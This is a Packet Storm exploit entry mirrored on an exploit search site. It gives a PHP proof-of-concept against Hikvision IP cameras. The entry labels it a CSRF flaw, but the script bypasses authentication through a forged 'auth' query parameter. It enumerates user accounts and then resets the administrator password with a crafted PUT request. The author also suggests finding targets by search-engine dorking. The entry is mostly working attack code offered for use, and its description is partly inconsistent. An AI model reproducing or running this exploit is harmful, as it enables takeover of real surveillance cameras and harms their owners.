Share
## https://sploitus.com/exploit?id=PACKETSTORM:182019
=============================================================================================================================================  
| # Title : Hikvision IP Camera CSRF Add ADmin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.hikvision.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The vulnerability has been present in Hikvision products since 2014.  
  
[+] add new admin.  
  
[+] Line 104 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
class HikvisionExploit {  
  
private $target;  
private $port;  
private $username;  
private $password;  
private $id;  
private $storeCred;  
  
public function __construct($target, $port = 80, $username = 'admin', $password = 'Pa$$W0rd', $id = 1, $storeCred = true) {  
$this->target = $target;  
$this->port = $port;  
$this->username = $username;  
$this->password = $password;  
$this->id = $id;  
$this->storeCred = $storeCred;  
}  
  
public function check() {  
$auth = base64_encode("admin:" . $this->generateRandomPassword());  
$url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);  
  
$response = $this->sendRequest('GET', $url);  
if (!$response) {  
return 'No response received from the target!';  
}  
  
if ($response['http_code'] == 200) {  
echo "Following users are available for password reset...\n";  
$xml = simplexml_load_string($response['body']);  
foreach ($xml->User as $user) {  
echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n";  
}  
return 'Vulnerable';  
} else {  
return 'Safe';  
}  
}  
  
public function exploit() {  
if ($this->check() !== 'Vulnerable') {  
return false;  
}  
  
echo "Starting the password reset for {$this->username}...\n";  
  
$postData = "<User version=\"1.0\" xmlns=\"http://www.hikvision.com/ver10/XMLSchema\">\r\n" .  
"<id>{$this->id}</id>\r\n" .  
"<userName>{$this->username}</userName>\r\n" .  
"<password>{$this->password}</password>\r\n</User>";  
  
$auth = base64_encode("admin:" . $this->generateRandomPassword());  
$url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);  
  
$response = $this->sendRequest('PUT', $url, $postData, 'application/xml');  
  
if (!$response) {  
echo "Target server did not respond to the password reset request\n";  
return false;  
}  
  
if ($response['http_code'] == 200) {  
echo "Password reset for {$this->username} was successfully completed!\n";  
echo "Please log in with your new password: {$this->password}\n";  
if ($this->storeCred) {  
$this->reportCreds();  
}  
} else {  
echo "Unknown Error. Password reset was not successful!\n";  
}  
}  
  
private function sendRequest($method, $url, $data = null, $contentType = null) {  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);  
if ($data) {  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
}  
if ($contentType) {  
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]);  
}  
$response = curl_exec($ch);  
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);  
curl_close($ch);  
  
return ['http_code' => $http_code, 'body' => $response];  
}  
  
private function generateRandomPassword($length = 10) {  
return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length);  
}  
  
private function reportCreds() {  
// In a real implementation, you could store the credentials into a database  
echo "Credentials for {$this->username} were added to the database...\n";  
}  
}  
  
// Example usage  
$exploit = new HikvisionExploit('target-ip');  
$exploit->exploit();  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================